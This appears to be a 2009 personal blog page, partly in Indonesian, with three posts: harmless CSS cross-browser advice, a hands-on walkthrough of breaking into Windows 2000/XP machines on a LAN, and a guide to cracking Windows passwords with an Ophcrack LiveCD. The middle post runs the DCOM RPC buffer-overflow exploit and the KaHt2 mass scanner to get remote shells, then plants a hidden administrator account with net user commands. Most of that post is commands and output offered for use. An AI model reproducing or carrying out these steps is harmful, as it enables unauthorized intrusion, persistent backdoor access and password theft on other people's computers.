Sticky post
Thursday, February 12, 2009 3:44:44 PM
hacking, tips, article
Lumayan nih buat yang mo utak atik CSS, sorry karena males bikin translate nya so translate sendiri ya 
Cross - browser
The bad news is that CSS isn't implemented the same way across browsers.
The good news is, well, I'm afraid there's not much good news. Browser manufacturers are making an effort to standardize, and move a little closer to web developer utopia.
With the practical demise of Netscape, the major CSS offender, you'll need to test on fewer browsers too: IE and Firefox, possibly Opera and, if you're really feeling energetic, Safari and IE for Mac.
It's a question of how obsessive-compulsive you're feeling.
What's a developer to do?
Until then, we just have to deal with it. Choose designs that won't end in browser civil war and, where necessary, make use of browser-specific conditional statements.
For example,
<!--[if lt IE 7]>
<style>...</style>
<![endif]--> Worst case scenario, your page will look slightly different in IE and Firefox. You should still sleep at night.
To hack or not to hack?
Then you'll read up on these realy cool and sly "CSS hacks" that bring browsers to their knees.
You'll see code like this:
div.content {
width:400px;
voice-family: "\"}\"";
voice-family:inherit;
width:300px;
}
html>body .content {
width:300px;
}
You'll be tempted to use hacks to get just the right look across all browsers.
Don't give in to temptation. These hacks rely on unintended side-effects. Browser makers feel no obligation to support this behavior. In fact, they strive to eradicate these "bugs."
And so, with the next browser release, you may find many such pages "broken" and you'll have to go back to the drawing board.
In short: not to hack.
thanks to webonweboff.com
Saturday, February 14, 2009 1:29:16 PM
hacking, article, tips
BEGIN
PENGANTAR : Setelah sekian lama baca sana-sini ,bagaimana cara hacking windows 2000 ,khususnya yang dalam satu LAN. Akhirnya dapat juga caranya sampai kita betul-betul bisa shutdown dan copy atau liat2 file yang ada di target .
Sebelum kita mulai , siapkan dulu tools yang akan digunakan dan sedikit kesabaran.
* Tool-tool :
-> Sploit RPC/Dcom
-> kaht2 (win)
-> winrpcdcom ( *nix)
-> pstool ( psshutdown )
-> VNC ( Remote Client )
Langsung ke prakteknya
* Mengggunakan Sploit RpcDcom
* RpcDcom.c *nix
* Compile dulu sploitnya
[lakone@target sploit]gcc -o dcomexploit dcomexploit.c
[lakone@target sploit]chmod 755 dcomexploit
[lakone@target sploit]./dcomexploit
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and 1Benjurry
- Rewritten by HDM <hdm@metasploit.com>
- Ported to Win32 by Benjamin LauziFre <blauziere@altern.org>
- Usage: dcomexploit <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)
[lakone@target sploit]./dcomexploit 6 192.168.0.100
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm@metasploit.com>
- Ported to Win32 by Benjamin LauziFre <blauziere@altern.org>
- Using return address of 0x77f92a9b
- Connecting to 192.168.0.100
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> <-- masuk ,cara selanjutnya sama seperti kaht
* Kaht2 * win
Masuk ke command prompt dan jalankan kaht2 seperti :
C:>kaht2
_________________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION
________________________________________________
Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
example: KaHt2.exe 192.168.0.0 192.168.255.255
NEW!: Macros Available in shell enviroment!!
Type !! for more info into a shell.
C:\sploit> kaht2 192.168.0.2 192.168.0.254
[+] Targets: 192.168.0.2-192.168.0.254 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 43745
[+] Scan In Progress...
- Connecting to 192.168.0.21
Sending Exploit to a [Win2k] Server...FAILED
- Connecting to 192.168.0.100
Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> <-- Kita udah masuk shell nya target
C:\WINDOWS\system32>net user <-- melihat account yg bisa login
User accounts for \\E1337
--------------------------------------------------------------------
Administrator Guest
The command completed successfully.
C:\WINDOWS\system32>net <-- gunakan perintah-perintah net untuk membantu misi
The syntax of this command is:
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
C:\WINDOWS\system32>net user lakone password /add <-- insert login lakone ke PC target
The command completed successfully.
C:\WINDOWS\system32>net user <-- kita liat apakah login lakone udah ada
User accounts for \\E1337
---------------------------------------------------------------------
Administrator Guest lakone
The command completed successfully.
C:\WINDOWS\system32>net user lakone
User name lakone
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/26/2005 5:09 PM
Password expires 4/9/2005 3:55 PM
Password changeable 2/26/2005 5:09 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Users <-- group user biasa
Global Group memberships *None
The command completed successfully.
Login theday udah masuk, tunggu dulu ,itu login lakone hanya user biasa
sekarang kita masukan login lakone sebagai groups Administrator biar bebas
C:\WINDOWS\system32>net localgroup Administrators lakone /add
The command completed successfully.
User name lakone
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/26/2005 5:09 PM
Password expires 4/9/2005 3:55 PM
Password changeable 2/26/2005 5:09 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users <--liat
Global Group memberships *None
The command completed successfully.
Nah sekarang sudah ada login di pc target sebagai administrator. Gunakan aja perintah Net untuk melakukan itu.
Saturday, February 14, 2009 12:46:18 PM
hacking, article, tips
There are a number of reasons for needing to crack a Windows password: simply forgetting what the password is, working on a used computer, etc. No matter your reason for needing to, finding a Windows password is generally simple, and can be done in a very short period of time.
Items Needed:
- Blank CD
- Ophcrack
To find the Window's password, you'll need a program called Ophcrack. It is completely free, and works very well. Ophcrack is not really a program--it is a LiveCD that is burned to a blank CD (or a USB flash drive if using on a newer computer) and runs rainbow tables on a Slackware base.
Installing
Navigate to the official Ophcrack website at http://ophcrack.sourceforge.net/ -- download the Live CD ISO and save it to your computer. Once it is downloaded, you will need to burn the disc image to a blank CD. The software used will vary--if your system doesn't have burning software already installed, you can download a trial of Nero, or something free like ImgBurn. Burn it at a low speed.
Using
To use the software, insert the CD into the optical drive on the computer you wish to gain access to and hold the power button until it shuts down. Turn it back on and when the compute logo appears, press the button for the system to enter BIOS. Change the boot sequence to CD first, then Save and Exit BIOS.
The Live CD will start and the rainbow tables will automatically start working at the password. For the average users password, it will likely take about five seconds to crack. For a longer alphanumeric password, it could take a few minutes, but that is the exception, not the rule.
Once it finds the password, write it down somewhere, then remove the CD and restart the system. Enter the password at login and then change/remove it to whatever you would like.
Note: Common sense says that this should only be used on computers you are authorized to gain access to. If you use this to find the password to a computer that is not your, it is illegal. This article is for informational purposes only.
My Opera
(33%)
